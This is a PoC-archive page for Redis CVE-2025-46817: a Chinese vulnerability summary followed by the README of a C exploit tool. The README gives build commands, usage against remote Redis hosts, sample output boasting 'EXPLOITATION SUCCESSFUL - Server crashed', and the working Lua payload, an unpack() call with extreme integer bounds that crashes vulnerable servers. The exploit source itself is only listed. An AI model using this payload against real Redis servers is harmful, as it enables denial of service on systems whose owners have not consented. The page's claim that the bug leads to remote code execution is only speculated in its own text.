关联漏洞
标题:
Redis 输入验证错误漏洞
(CVE-2025-46817)
描述:Redis是美国Redis公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。 Redis 8.2.1及之前版本存在输入验证错误漏洞,该漏洞源于特制Lua脚本可能导致整数溢出,从而引发远程代码执行。
介绍
# CVE-2025-46817 Redis Integer Overflow Exploit
A lightweight C implementation of the CVE-2025-46817 exploit for Redis integer overflow vulnerability.
## 🚀 Features
- **Lightweight**: Single C file, no external dependencies beyond hiredis
- **Fast**: Native compilation for maximum performance
- **Colorful Output**: Beautiful terminal colors and icons
- **Crash Detection**: Automatically detects server crashes
- **Version Checking**: Identifies vulnerable Redis versions
- **Timeout Support**: Configurable connection timeouts
## 📋 Requirements
### Ubuntu/Debian
```bash
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev
```
### CentOS/RHEL
```bash
sudo yum install gcc hiredis-devel
```
### macOS
```bash
brew install hiredis
```
## 🔧 Compilation
```bash
gcc -o exploit exploit.c -lhiredis
```
## 🎯 Usage
### Basic Usage
```bash
./exploit -H 127.0.0.1 -P 6379
```
### Remote Target
```bash
./exploit -H 192.168.1.100 -P 6379 -t 5
```
### Command Line Options
```
-H <host> Redis server host (required)
-P <port> Redis server port (required)
-t <timeout> Connection timeout in seconds (default: 10)
-h Show help message
```
## 📊 Example Output
```
██▓███ █ █░███▄ █ ▄▄▄▄ █ ██ █████▒ █████▒▓█████ ██▀███
▓██░ ██▒▓█░ █ ░█░██ ▀█ █ ▓█████▄ ██ ▓██▒▓██ ▒▓██ ▒ ▓█ ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██ ▀█ ██▒▒██▒ ▄██▓██ ▒██░▒████ ░▒████ ░ ▒███ ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒ ▐▌██▒▒██░█▀ ▓▓█ ░██░░▓█▒ ░░▓█▒ ░ ▒▓█ ▄ ▒██▀▀█▄
▒██▒ ░ ░░░██▒██▓▒██░ ▓██░░▓█ ▀█▓▒▒█████▓ ░▒█░ ░▒█░ ░▒████▒░██▓ ▒██▒
▒▓▒░ ░ ░░ ▓░▒ ▒ ░ ▒░ ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒ ▒ ░ ▒ ░ ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░ ▒ ░ ░ ░ ░░ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░ ░ ░ ░ ░ ░▒ ░ ▒░
░░ ░ ░ ░ ░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░
░
CVE-2025-46817 Exploit Tool
Integer Overflow -> RCE Chain
Access -> https://pwnbuffer.org/
Author: Slayerkkk
Target: Redis <= 8.2.1
Type: Memory Corruption -> Code Execution
ℹ️ Testing connection to 127.0.0.1:6379...
✅ Connection successful
ℹ️ Redis version: 8.2.1
❌ VULNERABLE - Version <= 8.2.1
ℹ️ Testing Lua scripting...
✅ Lua enabled (1+1=2)
🚀 STARTING EXPLOITATION
==================================================
💀 Executing exploit payload...
Payload: Integer overflow via unpack()
💥 SERVER CRASHED - Connection lost!
📊 EXPLOITATION RESULT
==============================
💥 Status: crashed (2.34s)
💀 EXPLOITATION SUCCESSFUL - Server crashed!
CVE-2025-46817 vulnerability confirmed
```
## 🛡️ Affected Versions
- Redis <= 8.2.1
- Redis <= 8.0.3
- Redis <= 7.4.5
- Redis <= 7.2.10
- Redis <= 6.2.19
## 🔍 Technical Details
### Vulnerability
The exploit targets an integer overflow in Redis's Lua `unpack()` function implementation (`luaB_unpack`). When called with specific parameters, the signed integer arithmetic overflows, causing Redis to attempt materializing an enormous number of return values.
### Exploit Payload
```lua
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}
```
### Impact
- **Server Crash**: Immediate denial of service
- **Memory Corruption**: Heap/stack corruption
- **Potential RCE**: Memory corruption could lead to code execution
## 🎯 Detection Results
The tool reports one of these statuses:
- ✅ **survived**: Server handled the payload (likely patched)
- 💥 **crashed**: Server crashed (vulnerable)
- ⚠️ **timeout**: Server hung (likely vulnerable)
- ❌ **error**: Other error occurred
## 🙏 Credits
**Author**: Slayerkkk
**Website**: https://pwnbuffer.org
文件快照
[4.0K] /data/pocs/7a8b22f1ba5e633aa7eed7e5905970d233acf8f3
├── [ 12K] exploit.c
└── [4.7K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。